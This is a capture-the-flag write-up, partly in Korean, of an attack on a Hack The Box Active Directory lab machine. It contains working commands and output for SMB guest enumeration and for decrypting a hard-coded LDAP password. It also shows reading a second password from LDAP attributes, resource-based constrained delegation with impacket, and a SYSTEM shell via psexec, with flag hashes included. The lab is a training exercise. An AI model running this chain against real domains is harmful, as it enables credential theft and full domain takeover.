Proof of Concept
10.129.12.17
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Support]
└─$ nxc smb 10.129.12.17 --generate-hosts-file hosts
SMB 10.129.12.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Support]
└─$ cat hosts
10.129.12.17 DC.support.htb support.htb DC/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Support]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.12.17 DC.support.htb support.htb DCInitial Access
Guest 계정으로 support-tools SMB 디렉토리 접근 가능
┌──(kali㉿kali)-[~/Support]
└─$ nxc smb support.htb -u 'guest' -p '' --shares
SMB 10.129.12.17 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.129.12.17 445 DC [+] support.htb\guest:
SMB 10.129.12.17 445 DC [*] Enumerated shares
SMB 10.129.12.17 445 DC Share Permissions Remark
SMB 10.129.12.17 445 DC ----- ----------- ------
SMB 10.129.12.17 445 DC ADMIN$ Remote Admin
SMB 10.129.12.17 445 DC C$ Default share
SMB 10.129.12.17 445 DC IPC$ READ Remote IPC
SMB 10.129.12.17 445 DC NETLOGON Logon server share
SMB 10.129.12.17 445 DC support-tools READ support staff tools
SMB 10.129.12.17 445 DC SYSVOL Logon server sharesupport-tools SMB 디렉토리 열거 결과, UserInfo.exe.zip 파일 발견
┌──(kali㉿kali)-[~/Support]
└─$ smbclient //support.htb/support-tools/ -U 'guest'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
4026367 blocks of size 4096. 959422 blocks availableUserInfo.exe.zip 파일 다운로드
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (112.2 KiloBytes/sec) (average 112.2 KiloBytes/sec)
smb: \>UserInfo.exe.zip 압축 해제 후 Userinfo.exe 파일을 dnSpy로 분석 결과, LdapQuery 함수에서 ldap 계정으로 사용자 조회하는 것을 확인
using System;
using System.DirectoryServices;
namespace UserInfo.Services
{
// Token: 0x02000007 RID: 7
internal class LdapQuery
{
// Token: 0x06000012 RID: 18 RVA: 0x00002190 File Offset: 0x00000390
public LdapQuery()
{
string password = Protected.getPassword();
this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
this.entry.AuthenticationType = AuthenticationTypes.Secure;
this.ds = new DirectorySearcher(this.entry);
}
<SNIP>추가로 getPassword 함수에서 암호화된 비밀번호 발견
using System;
using System.Text;
namespace UserInfo.Services
{
// Token: 0x02000006 RID: 6
internal class Protected
{
// Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
public static string getPassword()
{
byte[] array = Convert.FromBase64String(Protected.enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
}
return Encoding.Default.GetString(array2);
}
// Token: 0x04000005 RID: 5
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
// Token: 0x04000006 RID: 6
private static byte[] key = Encoding.ASCII.GetBytes("armando");
}
}enc_password를 복호화하여 평문 비밀번호 획득
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
┌──(kali㉿kali)-[~/Support]
└─$ cat decrypt.py
import base64
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"
data = base64.b64decode(enc_password)
result = bytes([data[i] ^ key[i % len(key)] ^ 223 for i in range(len(data))])
print(result.decode())
┌──(kali㉿kali)-[~/Support]
└─$ python decrypt.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz알아낸 게정 정보로 LDAP 인증 성공
- ldap:nvEfEK16^1aM4tRWxPWO1%lmz
┌──(kali㉿kali)-[~/Support]
└─$ nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
LDAP 10.129.12.17 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
LDAP 10.129.12.17 389 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmzBloodHound 정보 수집
┌──(kali㉿kali)-[~/Support]
└─$ bloodhound-python -d 'support.htb' -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -c All -ns 10.129.12.17 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.support.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 07S
INFO: Compressing output into 20260218015956_bloodhound.zipldapsearch를 이용하여 LDAP 정보 수집 후 support 계정 정보에서 게정 비밀번호 발견
- Ironside47pleasure40Watchful
┌──(kali㉿kali)-[~/Support]
└─$ ldapsearch -x -H ldap://support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' > ldapsearch.txt
┌──(kali㉿kali)-[~/Support]
└─$ cat ldapsearch.txt | grep 'cn: support' -A 20 -B 20
lastLogoff: 0
lastLogon: 134158715967501299
pwdLastSet: 132982099064620523
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUAQAAA==
accountExpires: 9223372036854775807
logonCount: 1
sAMAccountName: ldap
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111146.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 134158714570314241
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 0
codePage: 0알아낸 계정 정보로 WinRM 접속 성공
┌──(kali㉿kali)-[~/Support]
└─$ evil-winrm -i support.htb -u 'support' -p 'Ironside47pleasure40Watchful'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
8d336ab7a3921334d41aa8c27e59a56e
*Evil-WinRM* PS C:\Users\support\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.12.17
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.10.10.2
10.129.0.1Privilege Escalation
Checked BloodHound
- The members of the group SHARED SUPPORT ACCOUNTS@SUPPORT.HTB have GenericAll permissions to the computer DC.SUPPORT.HTB.
- This is also known as full control. This permission allows the trustee to manipulate the target object however they wish.
Added a new attacker-controlled computer account with Impacket’s addcomputer.py
┌──(kali㉿kali)-[~/Support]
└─$ impacket-addcomputer -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host DC.support.htb -domain-netbios SUPPORT 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account ATTACKERSYSTEM$ with password Summer2018!.Configured the target object so that the attacker-controlled computer can delegate to it
┌──(kali㉿kali)-[~/Support]
└─$ impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACKERSYSTEM$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACKERSYSTEM$ (S-1-5-21-1677581083-3380853377-188903654-6101)Requested Service Ticket
┌──(kali㉿kali)-[~/Support]
└─$ impacket-getST -spn 'cifs/dc.support.htb' -impersonate 'Administrator' 'support.htb/attackersystem$:Summer2018!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
발급받은 티켓을 사용하여 Administrator로 접속
┌──(kali㉿kali)-[~/Support]
└─$ export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
┌──(kali㉿kali)-[~/Support]
└─$ impacket-psexec -k -no-pass administrator@dc.support.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file sIqFNCxy.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service YkOl on dc.support.htb.....
[*] Starting service YkOl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>Read root.txt
C:\Users\Administrator\Desktop> type root.txt
7afe0d3de3f464a0475aa6dd7c6496d3
C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.12.17
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.10.10.2
10.129.0.1